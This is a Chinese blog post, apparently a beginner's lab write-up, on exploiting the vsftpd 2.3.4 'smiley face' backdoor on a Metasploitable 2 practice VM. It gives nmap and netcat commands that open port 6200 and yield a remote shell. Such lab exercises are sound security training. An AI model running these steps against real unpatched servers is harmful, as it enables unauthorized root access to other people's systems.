kali渗透测试之远程控制:通过激活靶机Metasploitable 2中的笑脸漏洞使其开启6200端口进行远程控制

最新推荐文章于 2024-08-28 16:46:11 发布
最新推荐文章于 2024-08-28 16:46:11 发布
阅读量884 收藏 2
点赞数 1
文章标签: 网络安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64128402/article/details/134254139
版权
本文介绍了如何通过Nmap扫描发现Metasploitable2的6200端口漏洞,使用Netcat进行远程控制的过程,展示了渗透测试的基本步骤。尽管VSFTPD漏洞已修复,但对于学习者仍是实践的好例子。
摘要由CSDN通过智能技术生成

远程控制:为什么6200端口变成了一个“后门”

测试工具:Netcat(瑞士军刀)
扫描工具:Nmap 7.94

查看靶机Metasploitable 2 ip

使用指令ifconfig
使用指令ifconfig查询到靶机IP为192.168.85.132

在kali中使用Namp对靶机端口进行扫描

使用指令nmap 192.168.85.132
在这里插入图片描述
可观察到21端口开放

kali中使用netcat连接靶机进行远程控制

使用指令nc ip port 连接即:nc 192.168.85.132 21
连接上后运用语法user 内容随意:)激活笑脸漏洞,pass 随意输入,即可打开靶机中的6200端口
在这里插入图片描述

使用nmap测试靶机6200端口开启情况

使用指令nmap -p port ip来查询:nmap -p 6200 192.168.85.132
在这里插入图片描述
可以观察到此时靶机的6200端口已经开启

kali中使用netcat通过6200端口连接靶机进行远程控制

使用指令 nc ip port实现 nc 192.168.85.132 6200
在这里插入图片描述
连接上后,即可通过一系列查询指令,拿到我们想要的东西,至此该渗透完成。

小结

1.通过本次实验让我对渗透的流程有了一个具象的了解,通过简单的漏洞复现让我感受到了渗透的魅力
2.虽然vsftpd-2.3.4已经是一个非常久远的漏洞了,也早已被修复,但用来给初学渗透的小白们用来做练习是个不错的选择

Pluto☆
关注
永恒之蓝漏洞复现(二)对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
wty923的博客
01-12 1969
对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
HackTheBox :Kali linux配置教程,连接靶机
weixin_45627117的博客
08-26 5511
一、下载openvpn配置文件 点击右上角的connect to htb 选择代理的接口access和服务器server,以及对应的协议(绿色按钮表单),又UDP和TCP两种方式,UDP传输相对较快但是不可靠(注意选择不同的接口和服务器对应不同的文件,因此如果我们拨通VPN后,下次在使用相同的配置文件时对应的接口也要与之前的文件一致) 将下载好后的vpn配置文件存放在桌面,并且拖拽到kali的桌面里面 在开始配置之前我们要先配置好文件,如果kali没有安装openvpn...
DC-1靶机远程控制技术和权限提升技术的学习运用
最新发布
zyzy0512的博客
08-28 818
输入ifconfig回车查看kali的IP地址输入arp-scan -l回车扫描查看此网段下的设备IP,通过比对靶机开机前后的反馈信息得到靶机的IP地址注意:如果开机靶机后仍然检测不到靶机的IP地址,请确保靶机的网络设置为net模式,然后重启靶机试试。结果如图1.1所示。
渗透小技巧从getshell到3389端口远程桌面连接靶机
12-16 1万+
渗透或平时比赛还在为自己命令行操作不熟而感到烦恼吗?直接命令行方式启动远程桌面连接,让效率提高。
Kali Linux远程控制
qq_71207842的博客
06-12 2448
如果可以选择的话,你觉得黑客最希望对目标系统做些什么呢? 1、让目标系统上的服务崩溃。 2、在目标系统上执行某个程序。 3、直接控制目标系统。 是不是第3个选择是最激动人心的呢?
网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
qq_68643282的博客
03-12 2388
通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
xueshenlaila的博客
02-24 4258
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 这篇文章教大家了解Metasploitable2靶机系统 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1818
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全
网络安全kali渗透学习 web渗透入门 Metasploit渗透测试框架介绍-Metasploitable2-Linux 靶机系统介绍
xueshenlaila的博客
02-28 2265
Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### phpmyadmin: http://192.168.0.113/phpmyadmin ### username: root password: owaspbwa
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
05-20
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
DC系列(1)从0开始,kali配置和靶机DC-1
Nikris的博客
01-03 2803
从0开始的kali桥接设置和DC-1渗透。
Kali渗透测试-远程控制6200端口变成“后门”
Liu_Bruce的博客
05-06 3171
Kali渗透测试-远程控制6200端口变成“后门” 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机Metasploitable2 - Linux (IP:192.168.68.205) 攻击工具:Netcat(nc) “瑞士军刀” 扫描工具:Nmap version 7.92 漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200
kali渗透综合靶机(九)--Typhoon靶机
W小哥
03-27 4638
一、靶机下载 下载链接:https://download.vulnhub.com/billu/Billu_b0x.zip 二、Typhoon靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.9 1、主机...
kali靶机网络配置问题
leo788的博客
01-04 4099
前提:kali宿主机和靶机都使用的NAT网络配置,然而无论是arp-scan还是nmap还是netdiscover都找不到靶机ip,正常情况下可以找到。
记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)
热门推荐
5年编程经验的老猿。
09-23 1万+
很多人对黑客可能都是这样的印象,低调的穿着,修长的手指快速的在键盘上敲击,界面各种日志不断在打印,但是你有想过黑客用的是什么操作系统吗?windows或者linux? 实际上,很多黑客用的操作系统都是Kali linux,也是一种linux的发行版。 Kali linux系统包含了600多款渗透测试工具,今天我们就给大家分享一次Kali系统渗透靶机的详细过程。...
Metasploitable2笑脸漏洞复现
WRplayeR的博客
12-11 583
vsftpd 2.3.4 的代码存在几行与服务无关的代码,在检测到ftp登录的用户命存在 :) 时会执行。再次使用ftp连接,退出后直接使用nc连接,使用whoami命令可以发现是root账户。打开6200端口,在该端口可以无需密码并且以管理员的身份进行登入。扫描,ftp打开且版本为vsftpd 2.3.4。ftp连接,并在用户名内输入包含 " :) "开启Metasploitable2靶机。192.168.232.131为靶机。再次扫描可以发现其6200端口打开,找到网段并进行网络存活主机扫描。
渗透测试实战:Windows靶机的FTP与IIS漏洞探索
在本篇渗透测试学习笔记案例三,作者分享了如何进行实际渗透测试的过程。首先,实验环境设定在一个目标靶机(10.11.1.0/24)和攻击机(Kali Linux,10.11.0.90)的场景下。目标靶机IP为10.11.1.13,攻击者利用Nmap...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值